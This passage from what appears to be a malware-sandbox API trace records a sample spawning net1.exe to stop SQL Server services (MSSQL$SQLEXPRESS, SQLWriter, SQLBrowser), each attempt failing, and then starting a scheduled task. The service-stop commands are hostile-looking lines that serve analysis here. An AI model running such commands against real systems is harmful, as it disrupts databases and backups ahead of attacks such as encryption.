lpNumberOfCharsWritten=0x32fc14*=0x2) returned 1 [0071.990] _ultow (in: _Dest=0x889, _Radix=3341380 | out: _Dest=0x889) returned="2185" [0071.990] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74240000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0071.990] GetFileType (hFile=0xb) returned 0x2 [0071.991] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x32fc00 | out: lpMode=0x32fc00) returned 1 [0071.992] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x32fc20, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x32fc20*=0x34) returned 1 [0071.993] GetFileType (hFile=0xb) returned 0x2 [0071.994] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x32fc00 | out: lpMode=0x32fc00) returned 1 [0071.995] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32fc20, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x32fc20*=0x2) returned 1 [0072.020] NetApiBufferFree (Buffer=0x391c00) returned 0x0 [0072.020] NetApiBufferFree (Buffer=0x391c18) returned 0x0 [0072.020] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLBrowser" [0072.020] exit (_Code=2) Process: id = "67" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x26276000" os_pid = "0x8ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "55" os_parent_pid = "0x330" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SQLEXPRESS" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 190 os_tid = 0x5e4 [0071.855] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fd10 | out: lpSystemTimeAsFileTime=0x28fd10*(dwLowDateTime=0x998b33b0, dwHighDateTime=0x1d57b18)) [0071.855] GetCurrentProcessId () returned 0x8ac [0071.855] GetCurrentThreadId () returned 0x5e4 [0071.855] GetTickCount () returned 0x114bdc4 [0071.855] QueryPerformanceCounter (in: lpPerformanceCount=0x28fd08 | out: lpPerformanceCount=0x28fd08*=19207681239) returned 1 [0071.864] GetModuleHandleA (lpModuleName=0x0) returned 0xb00000 [0071.864] __set_app_type (_Type=0x1) [0071.864] __p__fmode () returned 0x74eb31f4 [0071.864] __p__commode () returned 0x74eb31fc [0071.864] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb0ffe6) returned 0x0 [0071.864] __getmainargs (in: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068, _DoWildCard=0, _StartInfo=0xb19024 | out: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068) returned 0 [0071.865] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.865] GetConsoleOutputCP () returned 0x1b5 [0071.882] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb19080 | out: lpCPInfo=0xb19080) returned 1 [0071.882] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.047] sprintf_s (in: _DstBuf=0x28fcc8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0072.047] setlocale (category=0, locale=".437") returned="English_United States.437" [0072.049] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0072.049] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0072.049] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SQLEXPRESS" [0072.050] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28fa94, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0072.050] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6a) returned 0x5c3bb8 [0072.050] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x28fc98 | out: Buffer=0x28fc98*=0x5c1c10) returned 0x0 [0072.050] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x28fc98 | out: Buffer=0x28fc98*=0x5c1c28) returned 0x0 [0072.050] _fileno (_File=0x74eb2900) returned 0 [0072.050] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0072.050] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0072.050] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0072.050] _wcsicmp (_String1="config", _String2="stop") returned -16 [0072.050] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0072.050] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0072.050] _wcsicmp (_String1="file", _String2="stop") returned -13 [0072.050] _wcsicmp (_String1="files", _String2="stop") returned -13 [0072.050] _wcsicmp (_String1="group", _String2="stop") returned -12 [0072.050] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0072.050] _wcsicmp (_String1="help", _String2="stop") returned -11 [0072.050] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0072.050] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0072.050] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0072.050] _wcsicmp (_String1="session", _String2="stop") returned -15 [0072.050] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0072.050] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0072.050] _wcsicmp (_String1="share", _String2="stop") returned -12 [0072.050] _wcsicmp (_String1="start", _String2="stop") returned -14 [0072.050] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0072.050] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0072.050] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0072.050] _wcsicmp (_String1="accounts", _String2="MSSQL$SQLEXPRESS") returned -12 [0072.050] _wcsicmp (_String1="computer", _String2="MSSQL$SQLEXPRESS") returned -10 [0072.051] _wcsicmp (_String1="config", _String2="MSSQL$SQLEXPRESS") returned -10 [0072.051] _wcsicmp (_String1="continue", _String2="MSSQL$SQLEXPRESS") returned -10 [0072.051] _wcsicmp (_String1="cont", _String2="MSSQL$SQLEXPRESS") returned -10 [0072.051] _wcsicmp (_String1="file", _String2="MSSQL$SQLEXPRESS") returned -7 [0072.051] _wcsicmp (_String1="files", _String2="MSSQL$SQLEXPRESS") returned -7 [0072.051] _wcsicmp (_String1="group", _String2="MSSQL$SQLEXPRESS") returned -6 [0072.051] _wcsicmp (_String1="groups", _String2="MSSQL$SQLEXPRESS") returned -6 [0072.051] _wcsicmp (_String1="help", _String2="MSSQL$SQLEXPRESS") returned -5 [0072.051] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SQLEXPRESS") returned -5 [0072.051] _wcsicmp (_String1="localgroup", _String2="MSSQL$SQLEXPRESS") returned -1 [0072.051] _wcsicmp (_String1="pause", _String2="MSSQL$SQLEXPRESS") returned 3 [0072.051] _wcsicmp (_String1="session", _String2="MSSQL$SQLEXPRESS") returned 6 [0072.051] _wcsicmp (_String1="sessions", _String2="MSSQL$SQLEXPRESS") returned 6 [0072.051] _wcsicmp (_String1="sess", _String2="MSSQL$SQLEXPRESS") returned 6 [0072.051] _wcsicmp (_String1="share", _String2="MSSQL$SQLEXPRESS") returned 6 [0072.051] _wcsicmp (_String1="start", _String2="MSSQL$SQLEXPRESS") returned 6 [0072.051] _wcsicmp (_String1="stats", _String2="MSSQL$SQLEXPRESS") returned 6 [0072.051] _wcsicmp (_String1="statistics", _String2="MSSQL$SQLEXPRESS") returned 6 [0072.051] _wcsicmp (_String1="stop", _String2="MSSQL$SQLEXPRESS") returned 6 [0072.051] _wcsicmp (_String1="time", _String2="MSSQL$SQLEXPRESS") returned 7 [0072.051] _wcsicmp (_String1="user", _String2="MSSQL$SQLEXPRESS") returned 8 [0072.051] _wcsicmp (_String1="users", _String2="MSSQL$SQLEXPRESS") returned 8 [0072.051] _wcsicmp (_String1="msg", _String2="MSSQL$SQLEXPRESS") returned -12 [0072.051] _wcsicmp (_String1="messenger", _String2="MSSQL$SQLEXPRESS") returned -14 [0072.051] _wcsicmp (_String1="receiver", _String2="MSSQL$SQLEXPRESS") returned 5 [0072.051] _wcsicmp (_String1="rcv", _String2="MSSQL$SQLEXPRESS") returned 5 [0072.051] _wcsicmp (_String1="netpopup", _String2="MSSQL$SQLEXPRESS") returned 1 [0072.051] _wcsicmp (_String1="redirector", _String2="MSSQL$SQLEXPRESS") returned 5 [0072.051] _wcsicmp (_String1="redir", _String2="MSSQL$SQLEXPRESS") returned 5 [0072.051] _wcsicmp (_String1="rdr", _String2="MSSQL$SQLEXPRESS") returned 5 [0072.051] _wcsicmp (_String1="workstation", _String2="MSSQL$SQLEXPRESS") returned 10 [0072.051] _wcsicmp (_String1="work", _String2="MSSQL$SQLEXPRESS") returned 10 [0072.051] _wcsicmp (_String1="wksta", _String2="MSSQL$SQLEXPRESS") returned 10 [0072.051] _wcsicmp (_String1="prdr", _String2="MSSQL$SQLEXPRESS") returned 3 [0072.051] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQLEXPRESS") returned -9 [0072.051] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQLEXPRESS") returned -1 [0072.052] _wcsicmp (_String1="server", _String2="MSSQL$SQLEXPRESS") returned 6 [0072.052] _wcsicmp (_String1="svr", _String2="MSSQL$SQLEXPRESS") returned 6 [0072.052] _wcsicmp (_String1="srv", _String2="MSSQL$SQLEXPRESS") returned 6 [0072.052] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQLEXPRESS") returned -1 [0072.052] _wcsicmp (_String1="alerter", _String2="MSSQL$SQLEXPRESS") returned -12 [0072.052] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQLEXPRESS") returned 1 [0072.052] _wcsupr (in: _String="MSSQL$SQLEXPRESS" | out: _String="MSSQL$SQLEXPRESS") returned="MSSQL$SQLEXPRESS" [0072.052] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5c54a0 [0072.055] GetServiceKeyNameW (in: hSCManager=0x5c54a0, lpDisplayName="MSSQL$SQLEXPRESS", lpServiceName=0xb1aaf0, lpcchBuffer=0x28fc34 | out: lpServiceName="", lpcchBuffer=0x28fc34) returned 0 [0072.056] _wcsicmp (_String1="msg", _String2="MSSQL$SQLEXPRESS") returned -12 [0072.056] _wcsicmp (_String1="messenger", _String2="MSSQL$SQLEXPRESS") returned -14 [0072.056] _wcsicmp (_String1="receiver", _String2="MSSQL$SQLEXPRESS") returned 5 [0072.056] _wcsicmp (_String1="rcv", _String2="MSSQL$SQLEXPRESS") returned 5 [0072.056] _wcsicmp (_String1="redirector", _String2="MSSQL$SQLEXPRESS") returned 5 [0072.056] _wcsicmp (_String1="redir", _String2="MSSQL$SQLEXPRESS") returned 5 [0072.056] _wcsicmp (_String1="rdr", _String2="MSSQL$SQLEXPRESS") returned 5 [0072.056] _wcsicmp (_String1="workstation", _String2="MSSQL$SQLEXPRESS") returned 10 [0072.056] _wcsicmp (_String1="work", _String2="MSSQL$SQLEXPRESS") returned 10 [0072.056] _wcsicmp (_String1="wksta", _String2="MSSQL$SQLEXPRESS") returned 10 [0072.056] _wcsicmp (_String1="prdr", _String2="MSSQL$SQLEXPRESS") returned 3 [0072.056] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQLEXPRESS") returned -9 [0072.056] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQLEXPRESS") returned -1 [0072.056] _wcsicmp (_String1="server", _String2="MSSQL$SQLEXPRESS") returned 6 [0072.056] _wcsicmp (_String1="svr", _String2="MSSQL$SQLEXPRESS") returned 6 [0072.056] _wcsicmp (_String1="srv", _String2="MSSQL$SQLEXPRESS") returned 6 [0072.056] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQLEXPRESS") returned -1 [0072.056] _wcsicmp (_String1="alerter", _String2="MSSQL$SQLEXPRESS") returned -12 [0072.056] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQLEXPRESS") returned 1 [0072.056] NetServiceControl (in: servername=0x0, service="MSSQL$SQLEXPRESS", opcode=0x0, arg=0x0, bufptr=0x28fc30 | out: bufptr=0x28fc30) returned 0x889 [0072.057] wcscpy_s (in: _Destination=0xb1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0072.057] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74170000 [0072.058] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74170000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0072.059] GetFileType (hFile=0xb) returned 0x2 [0072.059] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fb50 | out: lpMode=0x28fb50) returned 1 [0072.059] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x28fb70, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x28fb70*=0x1e) returned 1 [0072.060] GetFileType (hFile=0xb) returned 0x2 [0072.060] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fb50 | out: lpMode=0x28fb50) returned 1 [0072.060] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28fb70, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x28fb70*=0x2) returned 1 [0072.060] _ultow (in: _Dest=0x889, _Radix=2685856 | out: _Dest=0x889) returned="2185" [0072.060] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74170000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0072.061] GetFileType (hFile=0xb) returned 0x2 [0072.061] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fb5c | out: lpMode=0x28fb5c) returned 1 [0072.061] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x28fb7c, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x28fb7c*=0x34) returned 1 [0072.061] GetFileType (hFile=0xb) returned 0x2 [0072.062] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fb5c | out: lpMode=0x28fb5c) returned 1 [0072.062] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28fb7c, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x28fb7c*=0x2) returned 1 [0072.062] NetApiBufferFree (Buffer=0x5c1c10) returned 0x0 [0072.062] NetApiBufferFree (Buffer=0x5c1c28) returned 0x0 [0072.062] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SQLEXPRESS" [0072.063] exit (_Code=2) Process: id = "68" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1daad000" os_pid = "0x92c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x998" cmd_line = "C:\\Windows\\system32\\net1 stop SQLWriter" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 191 os_tid = 0x984 [0071.870] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df9cc | out: lpSystemTimeAsFileTime=0x2df9cc*(dwLowDateTime=0x998d9510, dwHighDateTime=0x1d57b18)) [0071.870] GetCurrentProcessId () returned 0x92c [0071.870] GetCurrentThreadId () returned 0x984 [0071.870] GetTickCount () returned 0x114bdd4 [0071.870] QueryPerformanceCounter (in: lpPerformanceCount=0x2df9c4 | out: lpPerformanceCount=0x2df9c4*=19209156453) returned 1 [0071.870] GetModuleHandleA (lpModuleName=0x0) returned 0xb00000 [0071.870] __set_app_type (_Type=0x1) [0071.870] __p__fmode () returned 0x74eb31f4 [0071.870] __p__commode () returned 0x74eb31fc [0071.871] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb0ffe6) returned 0x0 [0071.871] __getmainargs (in: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068, _DoWildCard=0, _StartInfo=0xb19024 | out: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068) returned 0 [0071.871] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.871] GetConsoleOutputCP () returned 0x1b5 [0071.884] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb19080 | out: lpCPInfo=0xb19080) returned 1 [0071.884] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.895] sprintf_s (in: _DstBuf=0x2df984, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0071.895] setlocale (category=0, locale=".437") returned="English_United States.437" [0071.930] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.930] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0071.930] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLWriter" [0071.930] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2df750, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0071.930] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x5c) returned 0x363ba8 [0071.930] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2df954 | out: Buffer=0x2df954*=0x361c00) returned 0x0 [0071.930] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2df954 | out: Buffer=0x2df954*=0x361c18) returned 0x0 [0071.930] _fileno (_File=0x74eb2900) returned 0 [0071.930] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0071.930] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0071.930] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0071.930] _wcsicmp (_String1="config", _String2="stop") returned -16 [0071.930] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0071.930] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0071.930] _wcsicmp (_String1="file", _String2="stop") returned -13 [0071.931] _wcsicmp (_String1="files", _String2="stop") returned -13 [0071.931] _wcsicmp (_String1="group", _String2="stop") returned -12 [0071.931] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0071.931] _wcsicmp (_String1="help", _String2="stop") returned -11 [0071.931] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0071.931] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0071.931] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0071.931] _wcsicmp (_String1="session", _String2="stop") returned -15 [0071.931] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0071.931] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0071.931] _wcsicmp (_String1="share", _String2="stop") returned -12 [0071.931] _wcsicmp (_String1="start", _String2="stop") returned -14 [0071.931] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0071.931] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0071.931] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0071.931] _wcsicmp (_String1="accounts", _String2="SQLWriter") returned -18 [0071.931] _wcsicmp (_String1="computer", _String2="SQLWriter") returned -16 [0071.931] _wcsicmp (_String1="config", _String2="SQLWriter") returned -16 [0071.931] _wcsicmp (_String1="continue", _String2="SQLWriter") returned -16 [0071.931] _wcsicmp (_String1="cont", _String2="SQLWriter") returned -16 [0071.931] _wcsicmp (_String1="file", _String2="SQLWriter") returned -13 [0071.931] _wcsicmp (_String1="files", _String2="SQLWriter") returned -13 [0071.931] _wcsicmp (_String1="group", _String2="SQLWriter") returned -12 [0071.931] _wcsicmp (_String1="groups", _String2="SQLWriter") returned -12 [0071.931] _wcsicmp (_String1="help", _String2="SQLWriter") returned -11 [0071.931] _wcsicmp (_String1="helpmsg", _String2="SQLWriter") returned -11 [0071.931] _wcsicmp (_String1="localgroup", _String2="SQLWriter") returned -7 [0071.931] _wcsicmp (_String1="pause", _String2="SQLWriter") returned -3 [0071.931] _wcsicmp (_String1="session", _String2="SQLWriter") returned -12 [0071.931] _wcsicmp (_String1="sessions", _String2="SQLWriter") returned -12 [0071.931] _wcsicmp (_String1="sess", _String2="SQLWriter") returned -12 [0071.931] _wcsicmp (_String1="share", _String2="SQLWriter") returned -9 [0071.931] _wcsicmp (_String1="start", _String2="SQLWriter") returned 3 [0071.931] _wcsicmp (_String1="stats", _String2="SQLWriter") returned 3 [0071.931] _wcsicmp (_String1="statistics", _String2="SQLWriter") returned 3 [0071.931] _wcsicmp (_String1="stop", _String2="SQLWriter") returned 3 [0071.931] _wcsicmp (_String1="time", _String2="SQLWriter") returned 1 [0071.932] _wcsicmp (_String1="user", _String2="SQLWriter") returned 2 [0071.932] _wcsicmp (_String1="users", _String2="SQLWriter") returned 2 [0071.932] _wcsicmp (_String1="msg", _String2="SQLWriter") returned -6 [0071.932] _wcsicmp (_String1="messenger", _String2="SQLWriter") returned -6 [0071.932] _wcsicmp (_String1="receiver", _String2="SQLWriter") returned -1 [0071.932] _wcsicmp (_String1="rcv", _String2="SQLWriter") returned -1 [0071.932] _wcsicmp (_String1="netpopup", _String2="SQLWriter") returned -5 [0071.932] _wcsicmp (_String1="redirector", _String2="SQLWriter") returned -1 [0071.932] _wcsicmp (_String1="redir", _String2="SQLWriter") returned -1 [0071.932] _wcsicmp (_String1="rdr", _String2="SQLWriter") returned -1 [0071.932] _wcsicmp (_String1="workstation", _String2="SQLWriter") returned 4 [0071.932] _wcsicmp (_String1="work", _String2="SQLWriter") returned 4 [0071.932] _wcsicmp (_String1="wksta", _String2="SQLWriter") returned 4 [0071.932] _wcsicmp (_String1="prdr", _String2="SQLWriter") returned -3 [0071.932] _wcsicmp (_String1="devrdr", _String2="SQLWriter") returned -15 [0071.932] _wcsicmp (_String1="lanmanworkstation", _String2="SQLWriter") returned -7 [0071.932] _wcsicmp (_String1="server", _String2="SQLWriter") returned -12 [0071.932] _wcsicmp (_String1="svr", _String2="SQLWriter") returned 5 [0071.932] _wcsicmp (_String1="srv", _String2="SQLWriter") returned 1 [0071.932] _wcsicmp (_String1="lanmanserver", _String2="SQLWriter") returned -7 [0071.932] _wcsicmp (_String1="alerter", _String2="SQLWriter") returned -18 [0071.932] _wcsicmp (_String1="netlogon", _String2="SQLWriter") returned -5 [0071.932] _wcsupr (in: _String="SQLWriter" | out: _String="SQLWRITER") returned="SQLWRITER" [0071.932] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x365480 [0072.064] GetServiceKeyNameW (in: hSCManager=0x365480, lpDisplayName="SQLWRITER", lpServiceName=0xb1aaf0, lpcchBuffer=0x2df8f0 | out: lpServiceName="", lpcchBuffer=0x2df8f0) returned 0 [0072.064] _wcsicmp (_String1="msg", _String2="SQLWRITER") returned -6 [0072.064] _wcsicmp (_String1="messenger", _String2="SQLWRITER") returned -6 [0072.065] _wcsicmp (_String1="receiver", _String2="SQLWRITER") returned -1 [0072.065] _wcsicmp (_String1="rcv", _String2="SQLWRITER") returned -1 [0072.065] _wcsicmp (_String1="redirector", _String2="SQLWRITER") returned -1 [0072.065] _wcsicmp (_String1="redir", _String2="SQLWRITER") returned -1 [0072.065] _wcsicmp (_String1="rdr", _String2="SQLWRITER") returned -1 [0072.065] _wcsicmp (_String1="workstation", _String2="SQLWRITER") returned 4 [0072.065] _wcsicmp (_String1="work", _String2="SQLWRITER") returned 4 [0072.065] _wcsicmp (_String1="wksta", _String2="SQLWRITER") returned 4 [0072.065] _wcsicmp (_String1="prdr", _String2="SQLWRITER") returned -3 [0072.065] _wcsicmp (_String1="devrdr", _String2="SQLWRITER") returned -15 [0072.065] _wcsicmp (_String1="lanmanworkstation", _String2="SQLWRITER") returned -7 [0072.065] _wcsicmp (_String1="server", _String2="SQLWRITER") returned -12 [0072.065] _wcsicmp (_String1="svr", _String2="SQLWRITER") returned 5 [0072.065] _wcsicmp (_String1="srv", _String2="SQLWRITER") returned 1 [0072.065] _wcsicmp (_String1="lanmanserver", _String2="SQLWRITER") returned -7 [0072.065] _wcsicmp (_String1="alerter", _String2="SQLWRITER") returned -18 [0072.065] _wcsicmp (_String1="netlogon", _String2="SQLWRITER") returned -5 [0072.065] NetServiceControl (in: servername=0x0, service="SQLWRITER", opcode=0x0, arg=0x0, bufptr=0x2df8ec | out: bufptr=0x2df8ec) returned 0x889 [0072.066] wcscpy_s (in: _Destination=0xb1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0072.066] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74170000 [0072.066] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74170000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0072.068] GetFileType (hFile=0xb) returned 0x2 [0072.068] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2df80c | out: lpMode=0x2df80c) returned 1 [0072.068] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x2df82c, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x2df82c*=0x1e) returned 1 [0072.069] GetFileType (hFile=0xb) returned 0x2 [0072.069] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2df80c | out: lpMode=0x2df80c) returned 1 [0072.069] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2df82c, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x2df82c*=0x2) returned 1 [0072.069] _ultow (in: _Dest=0x889, _Radix=3012700 | out: _Dest=0x889) returned="2185" [0072.069] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74170000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0072.070] GetFileType (hFile=0xb) returned 0x2 [0072.070] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2df818 | out: lpMode=0x2df818) returned 1 [0072.070] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x2df838, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x2df838*=0x34) returned 1 [0072.070] GetFileType (hFile=0xb) returned 0x2 [0072.070] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2df818 | out: lpMode=0x2df818) returned 1 [0072.071] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2df838, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x2df838*=0x2) returned 1 [0072.071] NetApiBufferFree (Buffer=0x361c00) returned 0x0 [0072.071] NetApiBufferFree (Buffer=0x361c18) returned 0x0 [0072.071] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLWriter" [0072.071] exit (_Code=2) Process: id = "69" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x5e7f000" os_pid = "0x50c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "44" os_parent_pid = "0x9e0" cmd_line = "taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS 